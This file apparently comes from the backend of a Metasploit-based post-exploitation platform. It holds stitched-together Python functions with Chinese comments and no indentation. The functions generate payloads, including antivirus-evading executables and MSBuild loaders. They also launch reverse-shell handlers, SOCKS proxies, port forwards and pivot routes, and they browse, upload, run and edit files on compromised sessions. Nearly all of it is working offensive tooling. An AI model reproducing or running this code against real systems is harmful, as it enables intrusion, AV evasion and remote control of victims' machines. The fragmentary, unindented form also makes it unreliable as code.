def create(sessionid=None, filename=None, dirpath=None, operation=None):
if operation == 'create_dir' and sessionid is not None and dirpath is not None: # 新建文件夹
formatdir = FileSession.deal_path(dirpath)
opts = {'OPERATION': 'create_dir', 'SESSION': sessionid, 'SESSION_DIR': formatdir}
result = MSFModule.run('post', 'multi/manage/file_system_operation_api', opts, runasjob=False, timeout=12)
if result is None:
context = data_return(301, FileSession_MSG.get(301), [])
return context
try:
result = json.loads(result)
except Exception as E:
logger.warning(E)
context = data_return(302, FileSession_MSG.get(302), {})
return context
if result.get('status') is not True:
context = data_return(303, FileSession_MSG.get(303), [])
return context
else:
context = data_return(201, FileSession_MSG.get(201), result.get('data'))
return context
# 上传文件
elif operation == 'upload_file' and sessionid is not None and filename is not None and dirpath is not None:
formatdir = FileSession.deal_path(dirpath)
opts = {'OPERATION': 'upload', 'SESSION': sessionid, 'SESSION_DIR': formatdir, 'MSF_FILE': filename}
result = MSFModule.run('post', 'multi/manage/file_system_operation_api', opts, runasjob=True, timeout=12)
if result is None:
context = data_return(301, FileSession_MSG.get(301), {})
return context
else:
context = data_return(201, FileSession_MSG.get(201), result)
return context
else:
context = data_return(306, FileSession_MSG.get(306), [])
return context
def create(socks_type=None, port=None):
if socks_type == "msf_socks4a":
opts = {'SRVHOST': '0.0.0.0', 'SRVPORT': port}
flag, lportsstr = is_empty_ports(port)
if flag is not True:
# 端口已占用
context = data_return(408, CODE_MSG.get(408), {})
return context
result = MSFModule.run(module_type="auxiliary",
mname="server/socks4a_api",
opts=opts,
runasjob=True)
if isinstance(result,
dict) is not True or result.get('job_id') is None:
opts['job_id'] = None
context = data_return(303, Socks_MSG.get(303), opts)
else:
job_id = int(result.get('job_id'))
if Job.is_msf_job_alive(job_id):
opts['job_id'] = int(result.get('job_id'))
Notice.send_success("新建msf_socks4a代理成功,Port: {}".format(
opts.get('SRVPORT'), opts.get('job_id')))
context = data_return(201, Socks_MSG.get(201), opts)
else:
context = data_return(306, Socks_MSG.get(306), opts)
return context
elif socks_type == "msf_socks5":
opts = {'SRVHOST': '0.0.0.0', 'SRVPORT': port}
flag, lportsstr = is_empty_ports(port)
if flag is not True:
# 端口已占用
context = data_return(408, CODE_MSG.get(408), {})
return context
result = MSFModule.run(module_type="auxiliary",
mname="server/socks5_api",
opts=opts,
runasjob=True)
if isinstance(result,
dict) is not True or result.get('job_id') is None:
opts['job_id'] = None
context = data_return(303, Socks_MSG.get(303), opts)
else:
job_id = int(result.get('job_id'))
if Job.is_msf_job_alive(job_id):
opts['job_id'] = int(result.get('job_id'))
Notice.send_success("新建msf_socks5代理成功,Port: {}".format(
opts.get('SRVPORT'), opts.get('job_id')))
context = data_return(201, Socks_MSG.get(201), opts)
else:
context = data_return(306, Socks_MSG.get(306), opts)
return context
def create(portfwdtype=None, lhost=None, lport=None, rhost=None, rport=None, sessionid=None):
# 获取不同转发的默认参数
flag, context = PortFwd._check_host_port(portfwdtype, lhost, lport, rhost, rport)
if flag is not True:
return context
# flag, lportsstr = is_empty_ports(lportint)
# if flag is not True:
# # 端口已占用
# context = dict_data_return(CODE, CODE_MSG.get(CODE), {})
# return context
opts = {'TYPE': portfwdtype,
'LHOST': lhost, 'LPORT': lport, 'RHOST': rhost, 'RPORT': rport,
'SESSION': sessionid, 'CMD': 'add'}
result = MSFModule.run(module_type="post", mname="multi/manage/portfwd_api", opts=opts)
if result is None:
context = data_return(308, PORTFWD_MSG.get(308), {})
return context
try:
result_dict = json.loads(result)
except Exception as E:
logger.warning(E)
context = data_return(301, PORTFWD_MSG.get(301), [])
return context
if result_dict.get('status') is True:
Notice.send_success(f"新增端口转发 SID:{sessionid} {portfwdtype} {lhost}/{lport} {rhost}/{rport}")
context = data_return(201, PORTFWD_MSG.get(201), result_dict.get('data'))
return context
else:
context = data_return(301, PORTFWD_MSG.get(301), [])
return context
def destory(subnet=None, netmask=None, sessionid=None):
opts = {
'CMD': 'delete',
'SUBNET': subnet,
'NETMASK': netmask,
'SESSION': sessionid
}
result = MSFModule.run(module_type="post",
mname="multi/manage/routeapi",
opts=opts)
if result is None:
context = data_return(505, CODE_MSG.get(505), [])
return context
try:
result_dict = json.loads(result)
except Exception as E:
logger.warning(E)
context = data_return(306, Route_MSG.get(306), {})
return context
if result_dict.get('status') is True:
Notice.send_info(f"删除路由,SID:{sessionid} {subnet}/{netmask}")
context = data_return(204, Route_MSG.get(204), {})
return context
else:
context = data_return(304, Route_MSG.get(304), {})
return context
def generate_bypass_exe(mname=None, opts=None):
"生成免杀的exe"
# 处理RHOST及LHOST参数
if mname.find("reverse") > 0:
try:
opts.pop('RHOST')
except Exception as _:
pass
elif mname.find("bind") > 0:
try:
opts.pop('LHOST')
except Exception as _:
pass
# 处理OverrideRequestHost参数
if opts.get('OverrideRequestHost') is True:
opts["LHOST"] = opts['OverrideLHOST']
opts["LPORT"] = opts['OverrideLPORT']
opts['OverrideRequestHost'] = False
Notice.send_warn("Payload包含OverrideRequestHost参数")
Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")
# EXTENSIONS参数
if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
opts['EXTENSIONS'] = 'stdapi'
opts["Format"] = "hex"
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
return None
shellcode = base64.b64decode(result.get('payload'))
byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=shellcode)
return byteresult
def create_post(loadpath=None,
sessionid=None,
hid=None,
custom_param=None):
module_config = Xcache.get_moduleconfig(loadpath)
# 获取模块配置
if module_config is None:
context = data_return(305, PostModuleActuator_MSG.get(305), {})
return context
# 处理模块参数
try:
custom_param = json.loads(custom_param)
except Exception as E:
logger.warning(E)
custom_param = {}
# 获取模块实例
class_intent = importlib.import_module(loadpath)
post_module_intent = class_intent.PostModule(sessionid, hid,
custom_param)
# 模块前序检查,调用check函数
try:
flag, msg = post_module_intent.check()
if flag is not True:
# 如果检查未通过,返回未通过原因(msg)
context = data_return(405, msg, {})
return context
except Exception as E:
logger.warning(E)
context = data_return(301, PostModuleActuator_MSG.get(301), {})
return context
try:
broker = post_module_intent.MODULE_BROKER
except Exception as E:
logger.warning(E)
context = data_return(305, PostModuleActuator_MSG.get(305), {})
return context
if broker == BROKER.post_python_job:
# 放入多模块队列
if aps_module.putin_post_python_module_queue(post_module_intent):
context = data_return(201, PostModuleActuator_MSG.get(201), {})
return context
else:
context = data_return(306, PostModuleActuator_MSG.get(306), {})
return context
elif broker == BROKER.post_msf_job:
# 放入后台运行队列
if MSFModule.putin_post_msf_module_queue(post_module_intent):
context = data_return(201, PostModuleActuator_MSG.get(201), {})
return context
else:
context = data_return(306, PostModuleActuator_MSG.get(306), {})
return context
else:
logger.warning("错误的broker")
def run_bot_wait_list():
# 检查当前任务数量是否大于3个
task_queue_length = Xcache.get_module_task_length()
if task_queue_length >= 3:
return
req = Xcache.pop_one_from_bot_wait()
if req is None:
return
broker = req.get("broker")
module_intent = req.get("module")
if broker == BROKER.bot_msf_job:
# 放入后台运行队列
MSFModule.putin_post_msf_module_queue(module_intent)
else:
logger.error("unknow broker")
def update(sessionid, filepath, filedata):
opts = {'OPERATION': 'update_file', 'SESSION': sessionid, 'SESSION_FILE': filepath, 'FILE_DATA': filedata}
result = MSFModule.run('post', 'multi/manage/file_system_operation_api', opts, runasjob=True, timeout=12)
if result is None:
context = data_return(301, FileSession_MSG.get(301), {})
return context
else:
context = data_return(204, FileSession_MSG.get(204), result)
return context
def generate_shellcode(mname=None, opts=None):
"""根据配置生成shellcode"""
# 处理RHOST及LHOST参数
if mname.find("reverse") > 0:
try:
opts.pop('RHOST')
except Exception as _:
pass
elif mname.find("bind") > 0:
try:
opts.pop('LHOST')
except Exception as _:
pass
# 处理OverrideRequestHost参数
if opts.get('OverrideRequestHost') is True:
opts["LHOST"] = opts['OverrideLHOST']
opts["LPORT"] = opts['OverrideLPORT']
Notice.send_warn("Payload包含OverrideRequestHost参数")
Notice.send_warn(
f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
Notice.send_warn(
f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")
# EXTENSIONS参数
if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
opts['EXTENSIONS'] = 'stdapi'
opts["Format"] = 'raw'
if "windows" in mname:
opts["Format"] = 'raw'
elif "linux" in mname:
opts["Format"] = 'raw'
elif "java" in mname:
opts["Format"] = 'jar'
elif "python" in mname:
opts["Format"] = 'py'
elif "php" in mname:
opts["Format"] = 'raw'
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
return result
byteresult = base64.b64decode(result.get('payload'))
return byteresult
def download_file(self, filepath=None):
"""返回下载的文件内容,二进制数据"""
opts = {
'OPERATION': 'download',
'SESSION': self.sessionid,
'SESSION_FILE': filepath
}
result = MSFModule.run('post',
'multi/manage/file_system_operation_api',
opts,
timeout=300) # 后台运行
if result is None:
return None
filename = os.path.basename(filepath)
binary_data = FileMsf.read_msf_file(filename)
if binary_data is None:
return None
else:
return binary_data
def registry_enumkeys(self, key, view=0):
module_type = "post"
mname = "windows/manage/registry_api"
opts = {
'SESSION': self.sessionid,
'VIEW': view,
'OPERATION': "registry_enumkeys",
'KEY': key,
}
result = MSFModule.run(module_type=module_type,
mname=mname,
opts=opts,
timeout=12)
if result is None:
return {'status': False, "message": "MSFRPC Error", "data": None}
try:
result = json.loads(result)
return result
except Exception as E:
return {'status': False, "message": E, "data": None}
def _get_info(self, info_part):
if self.sessionid is None:
return None
module_type = "post"
mname = "multi/gather/base_info"
opts = {'SESSION': self.sessionid, 'INFO_PART': info_part}
if self.sessionid is None or self.sessionid <= 0:
return None
result = MSFModule.run(module_type=module_type, mname=mname, opts=opts)
if result is None:
return None
try:
result_dict = json.loads(result)
if result_dict.get('status'):
return result_dict.get('data')
else:
return None
except Exception as E:
logger.warning(E)
return None
def create(subnet=None, netmask=None, sessionid=None, autoroute=None):
if autoroute is True:
# 调用autoroute
opts = {'CMD': 'autoadd', 'SESSION': sessionid}
else:
opts = {
'CMD': 'add',
'SUBNET': subnet,
'NETMASK': netmask,
'SESSION': sessionid
}
result = MSFModule.run(module_type="post",
mname="multi/manage/routeapi",
opts=opts)
if result is None:
context = data_return(505, CODE_MSG.get(505), [])
return context
try:
result_dict = json.loads(result)
except Exception as E:
logger.warning(E)
context = data_return(306, Route_MSG.get(306), [])
return context
if result_dict.get('status') is True:
if isinstance(result_dict.get('data'), list):
if autoroute:
Notice.send_success(f"新增路由,SID:{sessionid} 自动模式")
else:
Notice.send_success(
f"新增路由,SID:{sessionid} {subnet}/{netmask}")
context = data_return(201, Route_MSG.get(201),
result_dict.get('data'))
else:
context = data_return(305, Route_MSG.get(305), [])
return context
else:
context = data_return(305, Route_MSG.get(305), [])
return context
def destory(portfwdtype=None, lhost=None, lport=None, rhost=None, rport=None, sessionid=None):
if sessionid is not None or sessionid == -1:
opts = {'TYPE': portfwdtype, 'LHOST': lhost, 'LPORT': lport, 'RHOST': rhost, 'RPORT': rport,
'SESSION': sessionid, 'CMD': 'delete'}
result = MSFModule.run(module_type="post", mname="multi/manage/portfwd_api", opts=opts)
if result is None:
context = data_return(308, PORTFWD_MSG.get(308), {})
return context
try:
result_dict = json.loads(result)
except Exception as E:
logger.warning(E)
context = data_return(302, PORTFWD_MSG.get(302), [])
return context
if result_dict.get('status') is True:
Notice.send_info(f"删除端口转发 SID:{sessionid} {portfwdtype} {lhost}/{lport} {rhost}/{rport}")
context = data_return(204, PORTFWD_MSG.get(204), result_dict.get('data'))
return context
else:
context = data_return(305, PORTFWD_MSG.get(305), [])
return context
else:
context = data_return(306, PORTFWD_MSG.get(306), [])
return context
def create(mname=None, opts=None):
"""生成payload文件"""
# badchars = opts['BadChars'] | | ''
# fmt = opts['Format'] | | 'raw'
# force = opts['ForceEncode'] | | false
# template = opts['Template'] | | nil
# plat = opts['Platform'] | | nil
# keep = opts['KeepTemplateWorking'] | | false
# force = opts['ForceEncode'] | | false
# sled_size = opts['NopSledSize'].to_i | | 0
# iter = opts['Iterations'].to_i | | 0
# 清理历史文件
Payload._destroy_old_files()
# 处理RHOST及LHOST参数
if mname.find("reverse") > 0:
try:
opts.pop('RHOST')
except Exception as _:
pass
elif mname.find("bind") > 0:
try:
opts.pop('LHOST')
except Exception as _:
pass
# 处理OverrideRequestHost参数
if opts.get('OverrideRequestHost') is True:
opts["LHOST"] = opts['OverrideLHOST']
opts["LPORT"] = opts['OverrideLPORT']
opts['OverrideRequestHost'] = False
Notice.send_warn("Payload包含OverrideRequestHost参数")
Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")
# EXTENSIONS参数
if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
opts['EXTENSIONS'] = 'stdapi'
if opts.get("Format") == "AUTO":
if "windows" in mname:
opts["Format"] = 'exe-src'
elif "linux" in mname:
opts["Format"] = 'elf'
elif "java" in mname:
opts["Format"] = 'jar'
elif "python" in mname:
opts["Format"] = 'py'
elif "php" in mname:
opts["Format"] = 'raw'
else:
context = data_return(306, Payload_MSG.get(306), {})
return context
if opts.get("Format") in ["exe-diy", "dll-diy", "dll-mutex-diy", "elf-diy"]:
# 生成原始payload
tmp_type = opts.get("Format")
opts["Format"] = "hex"
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
context = data_return(305, Payload_MSG.get(305), {})
return context
byteresult = base64.b64decode(result.get('payload'))
filename = Payload._create_payload_with_loader(mname, byteresult, payload_type=tmp_type)
# 读取新的zip文件内容
payloadfile = os.path.join(File.tmp_dir(), filename)
if opts.get("HandlerName") is not None:
filename = f"{opts.get('HandlerName')}_{filename}"
byteresult = open(payloadfile, 'rb')
elif opts.get("Format") == "msbuild":
# 生成原始payload
opts["Format"] = "csharp"
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
context = data_return(305, Payload_MSG.get(305), {})
return context
byteresult = base64.b64decode(result.get('payload'))
filename = Payload._create_payload_use_msbuild(mname, byteresult)
# 读取新的zip文件内容
payloadfile = os.path.join(File.tmp_dir(), filename)
byteresult = open(payloadfile, 'rb')
elif opts.get("Format") == "exe-src":
opts["Format"] = "hex"
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
context = data_return(305, Payload_MSG.get(305), {})
return context
byteresult = base64.b64decode(result.get('payload'))
byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=byteresult)
filename = "{}.exe".format(int(time.time()))
elif opts.get("Format") == "exe-src-service":
opts["Format"] = "hex"
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
context = data_return(305, Payload_MSG.get(305), {})
return context
byteresult = base64.b64decode(result.get('payload')) # result为None会抛异常
byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=byteresult,
payload_type="REVERSE_HEX_AS_SERVICE")
filename = "{}.exe".format(int(time.time()))
else:
file_suffix = {
"c": "c",
"csharp": "cs",
"exe": "exe",
"exe-service": "exe",
"powershell": "ps1",
"psh-reflection": "ps1",
"psh-cmd": "ps1",
"hex": "hex",
"hta-psh": "hta",
"raw": "raw",
"vba": "vba",
"vbscript": "vbs",
"elf": None,
"elf-so": "so",
"jar": "jar",
"java": "java",
"war": "war",
"python": "py",
"py": "py",
"python-reflection": "py",
}
result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
if result is None:
context = data_return(305, Payload_MSG.get(305), {})
return context
byteresult = base64.b64decode(result.get('payload'))
if file_suffix.get(opts.get("Format")) is None:
filename = "{}".format(int(time.time()))
else:
filename = "{}.{}".format(int(time.time()), file_suffix.get(opts.get("Format")))
response = HttpResponse(byteresult)
response['Content-Type'] = 'application/octet-stream'
response['Code'] = 200
response['Message'] = parse.quote(Payload_MSG.get(201))
# 中文特殊处理
urlpart = parse.quote(os.path.splitext(filename)[0], 'utf-8')
leftpart = os.path.splitext(filename)[-1]
response['Content-Disposition'] = f"{urlpart}{leftpart}"
return response
def __init__(self,
sessionid=None,
rightinfo=False,
uacinfo=False,
pinfo=False):
self.sessionid = sessionid
self._rightinfo = rightinfo # uac开关,uac登记 TEMP目录
self._uacinfo = uacinfo # 管理员组 完整性
self._pinfo = pinfo # 进程相关信息
self._session_uuid = None
self.update_time = 0
# RIGHTINFO
self.is_in_admin_group = None
self.is_admin = None
self.tmpdir = None
# UACINFO
self.is_uac_enable = None
self.uac_level = -1
self.integrity = None
# PINFO
self.pid = -1
self.pname = None
self.ppath = None
self.puser = None
self.parch = None
self.processes = []
# 基本信息
self.load_powershell = False
self.load_python = False
self.domain = None
self.session_host = None
self.session_port = None
self.target_host = None
self.type = None
self.computer = None
self.arch = None
self.platform = None
self.last_checkin = 0
self.user = None
self.os = None
self.os_short = None
self.logged_on_users = 0
self.tunnel_local = None
self.tunnel_peer = None
self.tunnel_peer_ip = None
self.tunnel_peer_locate = None
self.tunnel_peer_asn = None
self.via_exploit = None
self.via_payload = None
self.route = []
self.sysinfo = {}
self.exploit_uuid = None
self.available = False
self.info = None
self.pid = 0
# 更新基本信息
self._set_base_info()
# 是否需要拓展的信息
if self._rightinfo or self._pinfo or self._uacinfo:
result = Xcache.get_session_info(self.sessionid)
if result is None:
module_type = "post"
mname = "multi/gather/session_info"
opts = {
'SESSION': self.sessionid,
'PINFO': self._pinfo,
'RIGHTINFO': self._rightinfo,
'UACINFO': self._uacinfo
}
result = MSFModule.run(module_type=module_type,
mname=mname,
opts=opts,
timeout=30)
if result is None:
Notice.send_warning("更新Session信息失败,请稍后重试")
return
try:
result_dict = json.loads(result)
self._set_advanced_info(result_dict)
if self._rightinfo and self._pinfo and self._uacinfo:
result_dict["update_time"] = int(time.time())
Xcache.set_session_info(self.sessionid,
json.dumps(result_dict))
except Exception as E:
logger.warning(E)
logger.warning("更新Session信息失败,返回消息为{}".format(result))
Notice.send_warning("更新Session信息失败,请稍后重试")
def list(sessionid=None,
filepath=None,
dirpath=None,
operation=None,
arg=""):
if operation == "list" and sessionid is not None and dirpath is not None: # 列目录
formatdir = FileSession.deal_path(dirpath)
opts = {
'OPERATION': 'list',
'SESSION': sessionid,
'SESSION_DIR': formatdir
}
result = MSFModule.run('post',
'multi/manage/file_system_operation_api',
opts,
runasjob=False,
timeout=12)
if result is None:
context = data_return(301, FileSession_MSG.get(301), {})
return context
try:
result = json.loads(result)
except Exception as E:
logger.warning(E)
context = data_return(302, FileSession_MSG.get(302), {})
return context
if result.get('status') is not True:
context = data_return(303, FileSession_MSG.get(303), {})
return context
else:
data = result.get('data')
entries = data.get('entries')
path = data.get('path')
for one in entries:
if len(one.get('mode').split('/')) > 1:
one['format_mode'] = one.get('mode').split('/')[1]
else:
one['format_mode'] = ''
if one.get('total_space') is not None and one.get(
'free_space') is not None:
use_space = one.get('total_space') - one.get(
'free_space')
one['format_size'] = FileSession.get_size_in_nice_string(
use_space)
one['format_mode'] = '{}|{}'.format(
FileSession.get_size_in_nice_string(
one.get('free_space')),
FileSession.get_size_in_nice_string(
one.get('total_space')))
else:
one['format_size'] = FileSession.get_size_in_nice_string(
one.get('size'))
if one.get('size') is None or one.get(
'size') >= 1024 * 100:
one['cat_able'] = False
else:
one['cat_able'] = True
if one.get('type') in [
'directory', 'file', 'fixed', "remote"
]:
one['absolute_path'] = os.path.join(
path,
one.get('name')).replace('\\\\',
'/').replace('\\', '/')
elif one.get('type') in ['fix', 'cdrom']:
one['absolute_path'] = "{}".format(one.get('name'))
else:
one['absolute_path'] = "{}".format(path)
context = data_return(200, CODE_MSG.get(200), data)
return context
elif operation == 'pwd' and sessionid is not None: # 列当前目录
opts = {'OPERATION': 'pwd', 'SESSION': sessionid}
result = MSFModule.run('post',
'multi/manage/file_system_operation_api',
opts,
runasjob=False,
timeout=12)
if result is None:
context = data_return(301, FileSession_MSG.get(301), {})
return context
try:
result = json.loads(result)
except Exception as E:
logger.warning(E)
context = data_return(302, FileSession_MSG.get(302), {})
return context
if result.get('status') is not True:
context = data_return(303, FileSession_MSG.get(303), {})
return context
else:
data = result.get('data')
entries = data.get('entries')
path = data.get('path')
for one in entries:
one['format_size'] = FileSession.get_size_in_nice_string(
one.get('size'))
if one.get('size') >= 1024 * 100:
one['cat_able'] = False
else:
one['cat_able'] = True
if one.get('type') in ['directory', 'file']:
one['absolute_path'] = os.path.join(
path,
one.get('name')).replace('\\\\',
'/').replace('\\', '/')
elif one.get('type') in ['fix', 'cdrom']:
one['absolute_path'] = "{}".format(one.get('name'))
else:
one['absolute_path'] = "{}".format(path)
if len(one.get('mode').split('/')) > 1:
one['format_mode'] = one.get('mode').split('/')[1]
else:
one['format_mode'] = ''
context = data_return(200, CODE_MSG.get(200), data)
return context
elif operation == 'download' and sessionid is not None and filepath is not None: # 下载文件
opts = {
'OPERATION': 'download',
'SESSION': sessionid,
'SESSION_FILE': filepath
}
result = MSFModule.run('post',
'multi/manage/file_system_operation_api',
opts,
runasjob=True) # 后台运行
if result is None:
context = data_return(301, FileSession_MSG.get(301), {})
return context
else:
context = data_return(200, CODE_MSG.get(200), result)
return context
elif operation == "run": # 执行文件
opts = {
'OPERATION': 'execute',
'SESSION': sessionid,
'SESSION_FILE': filepath,
'ARGS': arg
}
result = MSFModule.run('post',
'multi/manage/file_system_operation_api',
opts,
runasjob=True) # 后台运行
if result is None:
context = data_return(301, FileSession_MSG.get(301), {})
return context
else:
context = data_return(202, FileSession_MSG.get(202), result)
return context
elif operation == "cat": # 查看文件
opts = {
'OPERATION': 'cat',
'SESSION': sessionid,
'SESSION_FILE': filepath
}
moduleresult = MSFModule.run(
'post',
'multi/manage/file_system_operation_api',
opts,
runasjob=False,
timeout=12) # 后台运行
if moduleresult is None:
context = data_return(301, FileSession_MSG.get(301), {})
return context
else:
try:
moduleresult = json.loads(moduleresult)
except Exception as E:
logger.warning(E)
context = data_return(302, FileSession_MSG.get(302), {})
return context
if moduleresult.get("status"):
filedata = base64.b64decode(
moduleresult.get("data")).decode("utf-8", 'ignore')
result = {"data": filedata, "reason": filepath}
context = data_return(200, CODE_MSG.get(200), result)
return context
else:
result = {
"data": None,
"reason": moduleresult.get("message")
}
context = data_return(303, FileSession_MSG.get(303),
result)
return context
elif operation == "cd": # 查看文件
formatdir = FileSession.deal_path(dirpath)
opts = {
'OPERATION': 'cd',
'SESSION': sessionid,
'SESSION_DIR': formatdir
}
moduleresult = MSFModule.run(
'post',
'multi/manage/file_system_operation_api',
opts,
runasjob=False,
timeout=12) # 后台运行
if moduleresult is None:
context = data_return(301, FileSession_MSG.get(301), {})
return context
else:
try:
moduleresult = json.loads(moduleresult)
except Exception as E:
logger.warning(E)
context = data_return(302, FileSession_MSG.get(302), {})
return context
if moduleresult.get("status"):
result = {}
context = data_return(203, FileSession_MSG.get(203),
result)
return context
else:
result = {
"data": None,
"reason": moduleresult.get("message")
}
context = data_return(303, FileSession_MSG.get(303),
result)
return context
else:
context = data_return(306, FileSession_MSG.get(306), {})
return context
def create(opts=None):
# 所有的参数必须大写
# opts = {'PAYLOAD': payload, 'LHOST': LHOST, 'LPORT': LPORT, 'RHOST': RHOST}
if opts.get('VIRTUALHANDLER') is True: # 虚拟监听
opts.pop('VIRTUALHANDLER')
result = Handler.create_virtual_handler(opts)
if result is None:
opts['ID'] = None
context = data_return(301, Handler_MSG.get(301), opts)
else:
context = data_return(201, Handler_MSG.get(201), {})
else:
# 真正的监听
# 处理代理相关参数
if opts.get("proxies_proto") == "Direct" or opts.get("proxies_proto") is None:
try:
opts.pop('proxies_proto')
except Exception as _:
pass
try:
opts.pop('proxies_ipport')
except Exception as _:
pass
else:
proxies_proto = opts.get('proxies_proto')
proxies_ipport = opts.get('proxies_ipport')
opts["proxies"] = f"{proxies_proto}:{proxies_ipport}"
try:
opts.pop('proxies_proto')
except Exception as _:
pass
try:
opts.pop('proxies_ipport')
except Exception as _:
pass
try:
if opts.get('PAYLOAD').find("reverse") > 0:
try:
opts.pop('RHOST')
except Exception as _:
pass
# 查看端口是否已占用
# lport = int(opts.get('LPORT'))
# flag, lportsstr = is_empty_ports(lport)
# if flag is not True:
# context = dict_data_return(306, Handler_MSG.get(306), {})
# return context
elif opts.get('PAYLOAD').find("bind") > 0:
if opts.get('LHOST') is not None:
opts.pop('LHOST')
# 反向http(s)服务常驻问题特殊处理
if opts.get('PAYLOAD').find("reverse_http") or opts.get('PAYLOAD').find("reverse_winhttp"):
opts['EXITONSESSION'] = False
opts['KillHandlerFouce'] = True
else:
if opts.get('EXITONSESSION'):
opts['EXITONSESSION'] = True
else:
opts['EXITONSESSION'] = False
opts['PayloadUUIDSeed'] = str(uuid.uuid1())
except Exception as E:
logger.error(E)
context = data_return(500, CODE_MSG.get(500), {})
return context
result = MSFModule.run(module_type="exploit", mname="multi/handler", opts=opts, runasjob=True)
if isinstance(result, dict) is not True or result.get('job_id') is None:
opts['ID'] = None
context = data_return(301, Handler_MSG.get(301), opts)
else:
job_id = int(result.get('job_id'))
if Job.is_msf_job_alive(job_id):
opts['ID'] = int(result.get('job_id'))
Notice.send_success("新建监听成功:{} {} JobID:{}".format(opts.get('PAYLOAD'), opts.get('LPORT'),
result.get('job_id')))
context = data_return(201, Handler_MSG.get(201), opts)
else:
context = data_return(301, Handler_MSG.get(301), opts)
return context
